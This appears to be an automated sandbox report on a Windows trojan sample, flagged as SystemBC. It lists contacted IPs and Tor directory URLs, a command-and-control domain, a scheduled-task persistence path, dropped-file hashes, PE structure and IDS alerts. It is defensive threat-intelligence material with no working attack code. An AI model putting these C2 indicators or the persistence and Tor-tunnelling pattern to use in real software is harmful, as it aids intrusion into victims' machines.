                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20dfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6ffalse
                  • Avira URL Cloud: safe
                  unknown
                  http://77.7.81.140/tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8abfalse
                  • Avira URL Cloud: safe
                  unknown
                  asdasd08.xyztrue
                  • Avira URL Cloud: malware
                  unknown
                  http://77.7.81.140/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5false
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88false
                  • Avira URL Cloud: safe
                  unknown
                  http://77.7.81.140/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88false
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5false
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6ffalse
                  • Avira URL Cloud: safe
                  unknown
                  http://86.59.21.38/tor/status-vote/current/consensusfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://131.188.40.189/tor/status-vote/current/consensusfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://77.7.81.140/tor/server/fp/5d5ddff29b96cc566aa746636868eb07f97de60cfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://77.7.81.140/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20dfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/https://ip4.seeip.org/Microsoftp9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    https://386bsd.netorvsmwx.exe, 00000001.00000003.266947367.0000000001CF0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.364709435.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.264170871.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.256502569.0000000001970000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.270852014.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.458304685.0000000000D10000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.257004533.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.369687710.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.357230829.0000000001980000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.357387552.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.356893099.0000000001930000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.370114126.0000000001B60000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.365870747.0000000001C90000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.457651138.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.260754380.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.356920594.0000000001930000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.457509207.0000000000500000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.257457810.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.259547423.0000000001A10000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    84.144.111.46
                    unknownGermany
                    3320DTAGInternetserviceprovideroperationsDEfalse
                    84.155.152.82
                    unknownGermany
                    3320DTAGInternetserviceprovideroperationsDEfalse
                    34.171.171.32
                    asdasd08.xyzUnited States
                    2686ATGS-MMD-ASUStrue
                    77.7.81.140
                    unknownGermany
                    6805TDDE-ASN1DEfalse
                    86.59.21.38
                    unknownAustria
                    8437UTA-ASATfalse
                    151.20.208.221
                    unknownItaly
                    1267ASN-WINDTREIUNETEUfalse
                    84.62.245.6
                    unknownGermany
                    3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                    131.188.40.189
                    unknownGermany
                    680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                    144.217.95.12
                    unknownCanada
                    16276OVHFRfalse
                    23.128.64.141
                    ip4.seeip.orgUnited States
                    19969JOESDATACENTERUSfalse
                    64.185.227.156
                    api4.ipify.orgUnited States
                    18450WEBNXUSfalse
                    193.23.244.244
                    unknownGermany
                    50472CHAOS-ASDEfalse
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:764865
                    Start date and time:2022-12-11 09:24:08 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:p9CvI6kq7d.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@2/3@13/12
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 37.7% (good quality ratio 37.7%)
                    • Quality average: 80%
                    • Quality standard deviation: 21.8%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 16
                    • Number of non-executed functions: 36
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    TimeTypeDescription
                    09:25:00API Interceptor2x Sleep call for process: p9CvI6kq7d.exe modified
                    09:25:03Task SchedulerRun new task: orvsmwx path: C:\ProgramData\prfxiau\orvsmwx.exe s>start
                    09:25:03API Interceptor1x Sleep call for process: orvsmwx.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    86.59.21.38SPXp2YHDFz.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/server/fp/33d6a3a8bd977723fd4c053151f78d852ac62775
                    SPXp2YHDFz.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    ILI1MGzcig.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/server/fp/b31d89823fcaac31d3e2127ce5eca2628a6c1ae1
                    http://86.59.21.38/tor/status-vote/current/consensusGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    qO7zg5QKAX.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    PsNZLytUyV.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    KJN55hQKh2.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus.z
                    97238623.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus.z
                    XtW3COOOIB.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus.z
                    mc8U9fGRnK.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    hse8DRMQnI.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    d2Hh2e62ZG.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    RuntimeBroker.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    5e8d15.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    us6quGOhfX.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    RatLoader_Fixed.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    hgJC8DQxr4.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    AJa7iK95pL.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    FU5L5C1gQk.exeGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    21factura (1).jsGet hashmaliciousBrowse
                    • 86.59.21.38/tor/status-vote/current/consensus
                    34.171.171.32fR9fxNOWAx.exeGet hashmaliciousBrowse
                      jN2CDnstRW.exeGet hashmaliciousBrowse
                        jN2CDnstRW.exeGet hashmaliciousBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          api4.ipify.orgPurchase Order_2241838_20221210_201349-pdf.com.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          9y70QnPVM6.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          A4iB8dikvp.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          xApc02RDLP.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          3tZhflwLcF.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          NEW ORDER.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          No.786161678.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          SecuriteInfo.com.Win32.PWSX-gen.27511.29896.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          https://go.bdo.ca/subscription-center.htmlGet hashmaliciousBrowse
                          • 64.185.227.156
                          Payment.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          SecuriteInfo.com.Win32.PWSX-gen.15745.19996.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          SecuriteInfo.com.Win32.PWSX-gen.20150.900.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          SecuriteInfo.com.Trojan.PWS.Siggen3.24938.12431.19128.exeGet hashmaliciousBrowse
                          • 64.185.227.156
                          ip4.seeip.orgufU6GyukRT.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          7ADpIopHPA.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          ZVDfxevnJz.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          A7Rgb4xIaH.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          zZvN0iR77S.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          92.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          62.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          vape.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          Discord Nitro Generatorv1.24.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          memek.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          YE0L8DZO3q.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          Scarlet Fire.mp3.exe.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          CINEQ-MULTITOOL BP.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          FortnitegenUpdated.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          uwuwuwuwuw.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          SynapseX.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          NFT.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          199SS.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          Spoofer.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          Exploit v1.3 rethi.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          DTAGInternetserviceprovideroperationsDEascaris.sh4.elfGet hashmaliciousBrowse
                          • 79.240.187.221
                          ascaris.m68k.elfGet hashmaliciousBrowse
                          • 93.249.79.250
                          MO0Cyr6H4J.elfGet hashmaliciousBrowse
                          • 31.230.214.118
                          q1c7nqoR0P.elfGet hashmaliciousBrowse
                          • 91.49.101.151
                          A6De2hiUgN.elfGet hashmaliciousBrowse
                          • 80.140.128.203
                          RVs7Yo67uw.elfGet hashmaliciousBrowse
                          • 2.164.183.51
                          NQ1pI3UJai.elfGet hashmaliciousBrowse
                          • 93.222.15.243
                          ZG11Q8WGTS.elfGet hashmaliciousBrowse
                          • 46.78.198.80
                          qUC4fwxGhK.elfGet hashmaliciousBrowse
                          • 79.207.139.123
                          SPpRmdIkFp.elfGet hashmaliciousBrowse
                          • 80.133.212.3
                          8pRmUCh9Zd.elfGet hashmaliciousBrowse
                          • 212.184.217.157
                          3kjFL26yJc.elfGet hashmaliciousBrowse
                          • 2.161.78.155
                          FYlUdIUlMq.elfGet hashmaliciousBrowse
                          • 79.205.160.214
                          j5B4iCFpY3.elfGet hashmaliciousBrowse
                          • 91.54.23.53
                          7DFa9S1kbA.elfGet hashmaliciousBrowse
                          • 87.147.8.232
                          DsYilbWfVw.elfGet hashmaliciousBrowse
                          • 31.253.231.60
                          J0x6tLh41G.elfGet hashmaliciousBrowse
                          • 91.59.148.231
                          3yjVVrgxaK.elfGet hashmaliciousBrowse
                          • 193.98.246.16
                          yQWRcSoJ2F.elfGet hashmaliciousBrowse
                          • 87.172.218.193
                          ZM2GGQVNjn.elfGet hashmaliciousBrowse
                          • 79.195.229.140
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0ePbnc5ctKw1.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          ZQFMpLu7L2.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          h8brn9EMwG.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          zZYh6pdr9c.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          RMLLauncher.exe.virus.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          Purchase Order_2241838_20221210_201349-pdf.com.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          1040A_Final.pdf.lnkGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          9y70QnPVM6.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          DE26aj35IN.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          A4iB8dikvp.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          xApc02RDLP.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          3tZhflwLcF.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          fp_x86_x64pp_en_en_installfull.zipGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          https://nts.embluemail.com/p/cl?data=xeN2zmLAdKsJjNJSxxNKVNCZ%2FcaH9xo9YolNHffBn3aswbcAFcpIJPcyGlZpg%2BpajNSoMD7Lf9jxUak5G2JJdhyGiSugSfvKJm%2BjWjtLkAU%3D!-!8e4el7a!-!https://y50mlh.codesandbox.io/?kh=user@domain.comGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          NEW ORDER.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          file.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          No.786161678.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          SecuriteInfo.com.Win32.PWSX-gen.27511.29896.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          kN2n1bKMW4.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          Payment.exeGet hashmaliciousBrowse
                          • 23.128.64.141
                          • 64.185.227.156
                          No context
                          Process:C:\Users\user\Desktop\p9CvI6kq7d.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):111104
                          Entropy (8bit):6.99581154510648
                          Encrypted:false
                          SSDEEP:1536:tJBChC4Ri7LWJgg2vTC/29r2VoRvz7tM1kPYqwtFUNn0WJWsa9tNUQukOVRcqAZc:td7LrNTC/21RrtwqaFFF9tNUXfVRK
                          MD5:0F6F452EE406B3360E39819AAC42A200
                          SHA1:E62B9163C2EDDBC8BDF262FAF11AC1F5F1E25683
                          SHA-256:76BD9BEBDADFEDA8974424B76D669A8F22B4A1178B1A9CAAE0D2C5A60C9DB5E9
                          SHA-512:7A0ED3FC2195B52DF334D127B73A454FB65DBFA991CF9D543EACADC80B9874A7FB7894DDE66C265C03C7B6A794890C9D66ACD08525D843DFEC93D693FF96897C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 88%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................c.....r.....d................m.....s.....v....Rich...........................PE..L...fd1]................."...................@....@..........................`..............................................tw..<.... ..h3...........................................................................@...............................text...(!.......".................. ..`.rdata..xA...@...B...&..............@..@.data... ............h..............@....rsrc...h3... ...4...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\p9CvI6kq7d.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\p9CvI6kq7d.exe
                          File Type:data
                          Category:modified
                          Size (bytes):268
                          Entropy (8bit):3.572670509216669
                          Encrypted:false
                          SSDEEP:6:Go/80e/P0bhEZweZFr6toADRcF/JTMy0lWcf9luFP1:GoS/MbCrrY6FhwV31qt
                          MD5:FF040628B9BE90824F823104EB84D47B
                          SHA1:46C5912EEFE3794D2F567F7E33B656790D812D8C
                          SHA-256:036E7CA603E7E919EC3A3310D3A60E66E92422955B1A973BBB9C5C9BEB268802
                          SHA-512:723462C0F00194E2901E82E51962CD40DC2651C5F8BC980567BA9CF5EAB7E0C766E3685A347688F2F172732B935DE626C84373619AD552B595DE7E08B68AAF96
                          Malicious:false
                          Reputation:low
                          Preview:.....#....yC..>..-.F.......<... .....\.........."....................#.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.p.r.f.x.i.a.u.\.o.r.v.s.m.w.x...e.x.e.....s.t.a.r.t.......D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.h.a.r.d.z...................0.........J.....................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.99581154510648
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:p9CvI6kq7d.exe
                          File size:111104
                          MD5:0f6f452ee406b3360e39819aac42a200
                          SHA1:e62b9163c2eddbc8bdf262faf11ac1f5f1e25683
                          SHA256:76bd9bebdadfeda8974424b76d669a8f22b4a1178b1a9caae0d2c5a60c9db5e9
                          SHA512:7a0ed3fc2195b52df334d127b73a454fb65dbfa991cf9d543eacadc80b9874a7fb7894dde66c265c03c7b6a794890c9d66acd08525d843dfec93d693ff96897c
                          SSDEEP:1536:tJBChC4Ri7LWJgg2vTC/29r2VoRvz7tM1kPYqwtFUNn0WJWsa9tNUQukOVRcqAZc:td7LrNTC/21RrtwqaFFF9tNUXfVRK
                          TLSH:C6B3BF32B5C2D6B2C95A41B18860DE956BBFE4711235097777A8266F4F702D1823B33B
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................c.......r.......d.......................m.......s.......v.....Rich............................PE..L...fd1]...
                          Icon Hash:82d4d4d4d4d4d400
                          Entrypoint:0x4014ab
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5D316466 [Fri Jul 19 06:34:14 2019 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:6419b6fbb39b82d7c52316adbe2e0296
                          Instruction
                          call 00007FEB70BD7C01h
                          jmp 00007FEB70BD4DDEh
                          and dword ptr [004D0614h], 00000000h
                          call 00007FEB70BD7CD6h
                          mov dword ptr [004D0614h], eax
                          xor eax, eax
                          ret
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          push ebp
                          mov ebp, esp
                          sub esp, 08h
                          and esp, FFFFFFF0h
                          fstp qword ptr [esp]
                          movq xmm7, qword ptr [esp]
                          call 00007FEB70BD4F6Dh
                          leave
                          ret
                          movq xmm7, qword ptr [esp+04h]
                          unpcklpd xmm7, xmm7
                          movapd xmm2, xmm7
                          andpd xmm2, dqword ptr [00414220h]
                          comisd xmm2, qword ptr [00414348h]
                          jp 00007FEB70BD51ECh
                          jnc 00007FEB70BD51BBh
                          comisd xmm2, qword ptr [00414338h]
                          jnc 00007FEB70BD4FD0h
                          comisd xmm2, qword ptr [00414340h]
                          jc 00007FEB70BD515Ch
                          movapd xmm1, xmm2
                          mulpd xmm1, xmm2
                          movapd xmm3, xmm1
                          mulpd xmm3, xmm1
                          movapd xmm5, dqword ptr [004142F0h]
                          mulpd xmm5, xmm3
                          addpd xmm5, dqword ptr [004142E0h]
                          mulpd xmm5, xmm3
                          addpd xmm5, dqword ptr [004142D0h]
                          mulpd xmm5, xmm3
                          addpd xmm5, dqword ptr [004142C0h]
                          mulsd xmm5, xmm1
                          movapd xmm3, xmm5
                          shufpd xmm3, xmm3, 01h
                          Programming Language:
                          • [C++] VS2008 build 21022
                          • [ASM] VS2008 build 21022
                          • [ C ] VS2008 build 21022
                          • [IMP] VS2005 build 50727
                          • [RES] VS2008 build 21022
                          • [LNK] VS2008 build 21022
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x177740x3c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x3368.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x140000x1b8.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x121280x12200False0.7223060344827587data7.3635971049801014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x140000x41780x4200False0.5266927083333334data5.9787886041479075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x190000xb86200x1600False0.35120738636363635data3.4969320794044383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0xd20000x33680x3400False0.5609224759615384data5.500283689560798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          VAMOWUWUKUYAYOCEYUCOYIBAJEMOY0xd3bf80x127bASCII text, with very long lines (4731), with no line terminators
                          RT_CURSOR0xd4e780x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"
                          RT_ICON0xd22800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                          RT_ICON0xd2b280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                          RT_STRING0xd50a80x2c0data
                          RT_GROUP_CURSOR0xd4fb00x14Lotus unknown worksheet or configuration, revision 0x1
                          RT_GROUP_ICON0xd3bd00x22data
                          RT_VERSION0xd4fc80xdcdata
                          DLLImport
                          KERNEL32.dllCreateMutexW, SetThreadContext, TlsGetValue, SetLocalTime, BuildCommDCBAndTimeoutsA, DeleteVolumeMountPointA, WriteTapemark, SetDefaultCommConfigW, WaitForSingleObject, SleepEx, SetTapeParameters, GetTickCount, GetCommandLineA, GetPriorityClass, ActivateActCtx, FindResourceExA, GetPrivateProfileIntA, AddRefActCtx, GetConsoleMode, TerminateThread, GetPrivateProfileStructW, GetSystemPowerStatus, SizeofResource, SetSystemTimeAdjustment, WritePrivateProfileStructW, SetConsoleMode, CreateSemaphoreA, GetBinaryTypeW, CompareStringW, lstrlenW, GetNamedPipeHandleStateW, GetTapeStatus, MoveFileW, SetFileApisToOEM, GetLocalTime, LoadLibraryA, GetConsoleScreenBufferInfo, LocalAlloc, AddAtomW, SetCurrentDirectoryW, GetProfileStringA, PostQueuedCompletionStatus, GetTapeParameters, ContinueDebugEvent, VirtualProtect, GetConsoleCursorInfo, DuplicateHandle, _lopen, DebugBreak, GetSystemTime, lstrcpyW, GetStartupInfoW, RaiseException, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, LeaveCriticalSection, EnterCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, LCMapStringA, LCMapStringW
                          USER32.dllGetListBoxInfo
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.38.8.8.859869532031427 12/11/22-09:25:03.649156UDP2031427ET TROJAN Observed SystemBC CnC Domain in DNS Query5986953192.168.2.38.8.8.8
                          192.168.2.38.8.8.860625532031427 12/11/22-09:26:31.319789UDP2031427ET TROJAN Observed SystemBC CnC Domain in DNS Query6062553192.168.2.38.8.8.8
                          192.168.2.38.8.8.857990532031427 12/11/22-09:25:50.584799UDP2031427ET TROJAN Observed SystemBC CnC Domain in DNS Query5799053192.168.2.38.8.8.8
                          192.168.2.38.8.8.851139532031427 12/11/22-09:26:46.160582UDP2031427ET TROJAN Observed SystemBC CnC Domain in DNS Query5113953192.168.2.38.8.8.8
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 11, 2022 09:25:03.768495083 CET496894039192.168.2.334.171.171.32
                          Dec 11, 2022 09:25:03.936191082 CET40394968934.171.171.32192.168.2.3
                          Dec 11, 2022 09:25:03.936328888 CET496894039192.168.2.334.171.171.32
                          Dec 11, 2022 09:25:03.937242031 CET496894039192.168.2.334.171.171.32
                          Dec 11, 2022 09:25:04.104444027 CET40394968934.171.171.32192.168.2.3
                          Dec 11, 2022 09:25:04.106853962 CET40394968934.171.171.32192.168.2.3
                          Dec 11, 2022 09:25:04.107129097 CET496894039192.168.2.334.171.171.32
